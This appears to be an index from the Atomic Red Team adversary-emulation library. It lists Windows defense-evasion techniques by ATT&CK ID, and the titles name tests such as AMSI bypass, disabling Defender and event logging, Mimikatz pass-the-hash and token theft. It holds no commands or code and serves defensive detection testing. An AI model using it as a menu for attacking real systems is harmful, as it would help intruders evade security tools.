- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #3: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #8: DiskShadow Command Execution [windows]
- Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- Atomic Test #10: Lolbin Gpscript logon option [windows]
- Atomic Test #11: Lolbin Gpscript startup option [windows]
- Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell [windows]
- Atomic Test #3: Kill Event Log Service Threads [windows]
- Atomic Test #4: Impair Windows Audit Log Policy [windows]
- Atomic Test #5: Clear Windows Audit Policy Config [windows]
- Atomic Test #6: Disable Event Logging with wevtutil [windows]
- Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #18: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
- Atomic Test #19: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
- Atomic Test #20: Blackbit - Disable Windows Firewall using netsh firewall [windows]
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- Atomic Test #35: Disable Windows Toast Notifications [windows]
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
- Atomic Test #39: NetWire RAT Registry Key Creation [windows]
- Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
- Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
- Atomic Test #42: Disable Windows Error Reporting Settings [windows]
- Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
- Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
- Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
- Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
- Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
- Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
- Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
- Atomic Test #50: Disable Win Defender Notification [windows]
- Atomic Test #51: Disable Windows OS Auto Update [windows]
- Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
- Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
- Atomic Test #54: Do Not Connect To Win Update [windows]
- Atomic Test #55: Tamper Win Defender Protection [windows]
- Atomic Test #56: Snake Malware Registry Blob [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.001 Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #6: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #7: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #4: Execute LNK file from ISO [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #3: Create Hidden User in Registry [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.003 Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- Atomic Test #8: Decompile Local CHM File [windows]
- [T1070.005 Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #28: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #29: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #30: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- Atomic Test #31: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
- Atomic Test #32: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
- Atomic Test #33: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
- Atomic Test #34: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
- Atomic Test #35: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
- Atomic Test #36: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
- Atomic Test #37: Delete Windows Defender Scheduled Tasks [windows]
- Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1073 DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.010 Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.007 Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1096 NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
